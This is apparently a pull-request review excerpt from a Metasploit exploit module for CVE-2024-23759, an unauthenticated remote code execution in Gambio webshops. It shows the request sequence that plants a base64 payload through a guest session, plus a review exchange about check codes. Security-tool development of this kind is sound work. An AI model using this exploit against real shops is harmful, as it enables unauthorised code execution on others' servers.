modules/exploits/multi/http/gambio_unauth_rce_cve_2024_23759.rb

```diff
@@ -0,0 +1,238 @@
+    final_payload_b64 = Base64.strict_encode64(final_payload)
+
+    # create guest user to get a valid session cookie
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'shop.php?do=CreateGuest/Proceed'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'firstname' => firstname,
+        'lastname' => lastname,
+        'email_address' => email,
+        'email_address_confirm' => email,
+        'b2b_status' => 0,
+        'company' => nil,
+        'vat' => nil,
+        'street_address' => Rex::Text.rand_text_alpha_lower(8..12),
+        'postcode' => Rex::Text.rand_text_numeric(5),
+        'city' => Rex::Text.rand_text_alpha_lower(4..12),
+        'country' => 8,
+        'telephone' => Rex::Text.rand_text_numeric(10),
+        'fax' => nil,
+        'action' => 'process'
+      }
+    })
+    if res && res.code == 302
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'shop.php?do=Parcelshopfinder/AddAddressBookEntry'),
+        'ctype' => 'application/x-www-form-urlencoded',
+        'keep_cookies' => true,
+        'vars_post' => {
+          'checkout_started' => 0,
+          'search' => final_payload_b64,
+          'street_address' => Rex::Text.rand_text_alpha_lower(4..12),
+          'house_number' => Rex::Text.rand_text_numeric(1..2),
+          'additional_info' => nil,
+          'postcode' => Rex::Text.rand_text_numeric(5),
+          'city' => Rex::Text.rand_text_alpha_lower(8..12),
+          'country' => 'DE',
+          'firstname' => firstname,
+          'lastname' => lastname,
+          'postnumber' => Rex::Text.rand_text_numeric(6),
+          'psf_name' => Rex::Text.rand_text_alpha_lower(1..3)
+        }
+      })
+    end
+    res
+  end
+
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path)
+    })
+    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200
+
+    # Check if target is running a Gambio webshop
+    # Search for "Gambio" on the login page
+    return CheckCode::Safe unless res.body.include?('gambio')
+
+    CheckCode::Appears('It looks like Gambio Webshop is running.')
```

Comment:
It looks like `CheckCode::Detected` should be used here. `CheckCode::Appears` is used when you know the target might be vulnerable. It is usually used when you retrieve the version and check it against the vulnerable version numbers. Maybe there is a way to detect the application's version?

https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes

Reply:
Did not find a way to get a version. API calls are all authenticated and does not provide that info.
Changed it to `Checkcode::Detected` for now. See https://github.com/rapid7/metasploit-framework/pull/19005/commits/9f50f12e6ed96b27ad2650ac502feaa7a289385b.